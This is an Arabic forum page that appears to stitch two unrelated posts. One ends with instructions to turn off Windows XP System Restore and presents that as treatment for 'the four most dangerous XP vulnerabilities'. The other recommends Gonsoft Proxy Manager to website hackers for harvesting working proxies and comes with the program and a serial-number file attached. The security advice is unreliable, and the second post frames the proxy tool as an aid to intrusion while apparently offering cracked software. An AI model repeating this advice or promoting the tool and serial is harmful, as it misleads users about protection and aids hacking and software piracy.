ثم قف فى اى مكان فارغ بالماوس ثم اضغط بمؤشر الماوس الايمن واختر

properties

ثم

system restore

وضع علامة صح بالمربع

turn of system restore



هذة اخطر اربعة ثغرات بويندوز اكس بى وعلاجها امر هام جدا لحماية جهازك


تحيــــــــــــــــــــاتـــــــــــــــــــــــى

السلام عليكــــم



طبعا كلنا يعرف اهمية البروكسي خاصة لمخترقي

المواقع .

اليكم برنامج:

Gonsoft Proxy Manager 2.28

برنامج صغير ورائع لأعطائكم افضل انواع البروكسي

على مدار الساعة

وسحب البروكسيات بشكل ألي من المواقع وانزالها على اعدادات البروكسي

في اجهزتكم وايضا به خاصية الـتأكد من صحة البروكسي من ناحية ان كان

شغال او لا!


البرنامج والسيريال بالمرفقاااات

الملفات المرفقة

ProxyManager.rar‏

seria.txt‏